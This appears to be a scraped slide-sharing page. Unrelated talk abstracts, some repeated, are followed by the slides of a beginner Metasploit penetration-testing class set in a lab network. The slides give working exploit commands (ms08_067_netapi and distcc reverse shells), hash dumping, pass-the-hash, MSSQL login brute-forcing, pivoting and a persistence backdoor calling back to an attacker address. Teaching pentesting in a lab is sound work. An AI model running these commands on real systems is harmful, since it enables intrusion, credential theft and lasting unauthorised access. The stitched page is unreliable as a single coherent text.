1. An introduction to Metasploit basics, terminology, and interfaces like Msfconsole.
2. A demonstration of exploiting vulnerabilities using Metasploit modules and payloads like Meterpreter.
3. A discussion of post-exploitation techniques in Metasploit like privilege escalation, lateral movement, and maintaining access.
Metasploit framework can also be called as ‘Swiss Army knife ’ of penetration testers as it provides multiple exploit, customization, easy to redevelop according to the requirements of the system . To secure our system and prevent it from any type of threats , we should perform the penetration testing.
The Attached slide was presented at Null Open Security/OWAP/G4H combined community event, the document shared here is a representation of Independent study on usage of Metasploit on purpose built vulnerable machine Metasploitable3. With New attack vectors such as Elastic Search API and Jenkins servers -21/01/2017
Contains
1. Introduction to Metasploit (why metasploit?)
2. Demo Setup and talked on how to- Using Metasploitable3
3. Networking with VirtualBox for personal lab
4. Auxiliary Modules (Scanners and Servers ) - Demo of snmp_enum
5. Exploit Module (searching exploits)
6. Payload types
7. Exploit Demo 1 - /exploit/multi/elasticsearch/script_mvel_rce
8. Exploit Demo 2 -
/exploit/multi/http/jenkins_script_console
Metasploit framework can also be called as ‘Swiss Army knife ’ of penetration testers as it provides multiple exploit, customization, easy to redevelop according to the requirements of the system . To secure our system and prevent it from any type of threats , we should perform the penetration testing.
The Attached slide was presented at Null Open Security/OWAP/G4H combined community event, the document shared here is a representation of Independent study on usage of Metasploit on purpose built vulnerable machine Metasploitable3. With New attack vectors such as Elastic Search API and Jenkins servers -21/01/2017
Contains
1. Introduction to Metasploit (why metasploit?)
2. Demo Setup and talked on how to- Using Metasploitable3
3. Networking with VirtualBox for personal lab
4. Auxiliary Modules (Scanners and Servers ) - Demo of snmp_enum
5. Exploit Module (searching exploits)
6. Payload types
7. Exploit Demo 1 - /exploit/multi/elasticsearch/script_mvel_rce
8. Exploit Demo 2 -
/exploit/multi/http/jenkins_script_console
Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits.
With the focus on security, most organisations test the security defenses via pen-testing. But what about after the network has been compromised. Is there an Advance Persistent Threat (APT) sitting on the network? Will the defenses be able to detect this?
This talk will discuss some of the open source tools that can help simulate this threat. So as to test the security defenses if an APT makes it onto the network.
Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world’s largest database of public, tested exploits.
With the focus on security, most organisations test the security defenses via pen-testing. But what about after the network has been compromised. Is there an Advance Persistent Threat (APT) sitting on the network? Will the defenses be able to detect this?
This talk will discuss some of the open source tools that can help simulate this threat. So as to test the security defenses if an APT makes it onto the network.
Why Data Virtualization? An Introduction by DenodoJusto Hidalgo
Data Virtualization means Real-time Data Access and Integration. But why do I need it? This presentation tries to answer it in a simple yet clear way.
By Alberto Pan, CTO of Denodo, and Justo Hidalgo, VP Product Management.
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-expert-metasploit
Après les trois formations, formation Hacking et Sécurité, l'essentiel , formation Hacking & Sécurité, Avancé et formation Hacking et Sécurité Expert - Réseaux sans fils, votre MVP Hamza KONDAH, revient avec cette nouvelle formation Hacking et Sécurité, dédiée entièrement à la maitrise de l’indispensable Metasploit.
Cette formation Hacking et Sécurité, Metasploit englobe une analyse et compréhension des différents éléments composants de Metasploit pour une exploitation efficace ainsi qu’une structuration des connaissances avant de passer aux attaques qui sont axées pratiques à 100 %.
Cette formation Hacking et Sécurité, Metasploit vise à vous donner la capacité d’effectuer des tests de pénétration en exploitant au maximum ce framework extrêmement puissant.
A la suite de cette formation Hacking et Sécurité, Metasploit, vous serez capable de bien comprendre les différents composants de Metasploit, pouvoir effectuer des tests de pénétration complets en exploitant la puissance de ce Framework, coder des modules, coder des scripts post exploitation, comprendre la notion de développement d’exploit, le débogage et le fuzzing, effectuer des attaques avancées et bien d’autres surprises.
Après cette formation Hacking et Sécurité, Metasploit, suivra la formation Hacking et Sécurité, Vulnérabilités Web qui est déjà en cours de réalisation.
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2thePlatform
TV audiences are demanding the ability to watch their
favorite programs whenever it’s most convenient for
them – whether that be during a live broadcast, in a few
hours, in a few days, or even in a few weeks post-broadcast.
Jodi Schneider presents "15 Business Story Ideas to Jump on Now" at a free business journalism workshop, "Covering Business on Tribal Lands," hosted by the Donald W. Reynolds National Center for Business Journalists and the Native American Journalists Association.
For more information about free training for business journalists, please visit businessjournalism.org.
Read this article for details about the basics of pediatrics medical billing and why outsourcing this billing task can be advantageous for practitioners.
Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Anonymous club of BMSCE, Talk and Demo on exploits on the Metasploit Framework and building Trojans using Msfvenom . By Siddharth.K (tech Head of anonymous club BMSCE)
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
This presentation is made for my college presentation of explaining "Threats, Vulnerabilities & Security measures in Linux' and also suggestion how you could enhance ur Linux OS security.
Similar to Metasploit for Penetration Testing: Beginner Class (20)
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
2. Acknowledgements
• Metasploit Team
• Offensive Security/Metasploit Unleashed
• Hackers for Charity
• David Kennedy
• BSides Delaware Crew
• Darren
3. Agenda
• Metasploit Basics
– Some terminology/brief intro to pentesting
– How Metasploit works
– Interacting with Metasploit
• Basic Exploitation
– Exploiting a vulnerability using Metasploit console
• Using Meterpreter
– Using the Meterpreter shell for post exploitation
4. Agenda
• Metasploit in a penetration test
– Information Gathering
– Vulnerability Scanning
– Exploitation in depth
– Post exploitation
– Reporting
• Hack some stuff
– Pop my boxes
6. What’s in the lab?
• Windows XP SP2
– IP address: 192.168.20.22
• Ubuntu Linux 8.04 (Metasploitable)
– IP address: 192.168.20.23
Others below .100 (.100 and above are you guys)
7. What is Penetration Testing?
Simulation of a real attack
Get out of jail free card for exploiting systems
Report to customers with findings and
recommendations
Find and remediate vulnerabilities before
attackers exploit them
9. Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to
do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
11. Exploitation Streamlining
• Traditional Pentest:
– Find public exploit
– Change offsets and return address for your target
– Replace shellcode
• Metasploit:
– Load Metasploit module
– Select target OS
– Set IP addresses
– Select payload
12. Using Msfconsole: Exploitation
use <module> - sets exploit/auxillary/etc. to use
set <x X> - set a parameter
setg <x X> - set a parameter globally
show <x> - lists all available x
exploit – runs the selected module
13. Windows Exploitation Example
search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.20.22 (set other options as well)
exploit
14. MSFcli Exploitation Example
./msfcli <exploit> <option=x> E
Example: msfcli
windows/smb/ms08_067_netapi
RHOST=192.168.1.2 LHOST=192.168.1.3
PAYLOAD=windows/shell/bind_tcp E
E = exploit
O = show options
P = show payloads
15. Linux Exploitation Example
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (your ip)
exploit
17. Meterpreter
Gain a session using a meterpreter payload
Memory based/never hits the disk
Everything a shell can do plus extra
18. Meterpreter Commands
help – shows all available commands
background – backgrounds the session
ps – shows all processes
migrate <process id>– moves meterpreter to
another process
getuid – shows the user
19. Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> -
pushes a file to the victim
hashdump – dumps the hashes from the sam
shell – drops you in a shell
20. Exercise
In Msfconsole use ms08_067_netapi to get a
reverse meterpreter shell on the Windows XP
machine.
Experiment with different payloads and
meterpreter commands.
21. Information Gathering
Learning as much about a target as possible
Examples: open ports, running services, installed
software
Identify points for further exploration
22. Metasploit and Databases
Metasploit supports MySQL and PostgreSQL
/etc/init.d/postgresql-8.4 start (starts
PostgeSQL)
msf > db_connect
postgres:password@127.0.0.1/metasploit
(connects to database server and creates
database metasploit)
23. Portscanning
Queries a host to see if a program is listening
Ex: Browsing to a website – webserver listens on
port 80
Listening ports are accessible by an attacker and
if vulnerable may be used for exploitation
Ex: ms08_067_netapi exploits smb on port 445
24. Metasploit and nmap
Port scanning and just about everything else
http://nmap.org/ man nmap
Ex: nmap -sV 192.168.20.20-99 -oA subnet1
(TCP version scan, all hosts 192.168.20.X,
outputs multiple formats beginning with
subnet1)
msf > db_import subnet1.xml
25. MSF Axillary Portscanners
msf > search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP syn scan)
Use auxiliary modules like exploits (use, set,
exploit, etc.)
26. Some Other MSF Scanners
scanner/smb/smb_version (scans port 445 for
the smb version, good way to get OS version)
scanner/ssh/ssh_version (queries the ssh
version)
scanner/ftp/anonymous (anonymous ftp login)
27. Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: SMB version scan in information gathering
returned port 445 open and target Windows
XP SP2, scan for ms08_067_netapi
vulnerability
28. Metasploit and Nessus
Tenable's Vulnerability Scanner (http://www.nessus.org)
msf>load nessus
msf > nessus_connect
student1:password@192.168.20.103 ok (ok says no ssl
is ok)
msf > nessus_policy_list
msf > nessus_scan_new -4 pwnage <ip range> (scan
using policy one, name it pwnage)
msf> nessus_report_list
msf> nessus_report_get <report id>
29. Metasploit Vulnerability Scanners
SMB Login
Given a set of credentials what systems can they
access?
scanner/smb/smb_login
Open VNC and X11
If misconfigured may be accessible without
credentials
scanner/vnc/vnc_none_auth
scanner/x11/open_x11
30. Using Msfconsole: Exploitation
use <module> - sets exploit/auxillary/etc. to use
set <x X> - set a parameter
setg <x X> - set a parameter globally
show <x> - lists all available x
exploit – runs the selected module
32. db_autopwn
By default just runs all the exploits that match a
given open port
Not stealthy
Using vulnerability data can be made smarter,
matches vulnerabilities instead of ports
db_autopwn -x -e
33. Attacking MSSQL
MSSQL TCP port can change, UDP port is 1434
msf> search mssql (shows all mssql modules)
msf> use scanner/mssql/mssql_ping (queries
UDP 1434 for information including TCP port)
msf> use scanner/mssql/mssql_login (tries
passwords to log into mssql)
msf> use windows/mssql/mssql_payload (logs
into mssql and gets a shell
34. We have a shell, now what?
Privilege escalation
Local information gathering
Exploiting additional hosts
Maintaining access
Forensic avoidance
35. Meterpreter: Privilege Escalation
A session has the privileges of the exploited
process
getuid (tells you what user your session is
running as)
getsystem (tries various techniques to escalate
privileges)
36. Meterpreter: Enabling Remote
Desktop
Turn on remote desktop, get it through the
firewall, put a user in the remote desktop
users group
run getgui –e
37. Meterpreter: Migrating
If the process that hosts meterpreter closes
meterpreter dies too
Example: client side exploit residing in the
browser
meterpreter> ps (shows all processes)
meterpreter> migrate <process id> (moves to a
new process)
38. Meterpreter: Searching for Content
Look for specific interesting files on the
exploited system
search -h
Example: search -f *.jpg (finds all the porn)
39. Pivoting
Scenario: Exploit a dual networked host, with a
routeable interface and non routable one. Can we
attack other hosts on the non routeable interface
without SSH tunneling?
Route add 10.0.0.0/24 1 (routes traffic to the
subnet through session 1)
Now you can portscan, exploit, etc. the non
routable subnet
40. PSExec
hashdump (dumps the hashes, not always easy
to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
41. Meterpreter: Persistence
Persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
Ex: run persistence -U -i 5 -p 443 –r
192.168.20.101 (respawns on login, at a 5
second interval on port 443 to ip
192.168.20.101)
42. Exercises
Perform a penetration test on the Windows and
Linux systems we used in class
Perform a penetration test on the lab network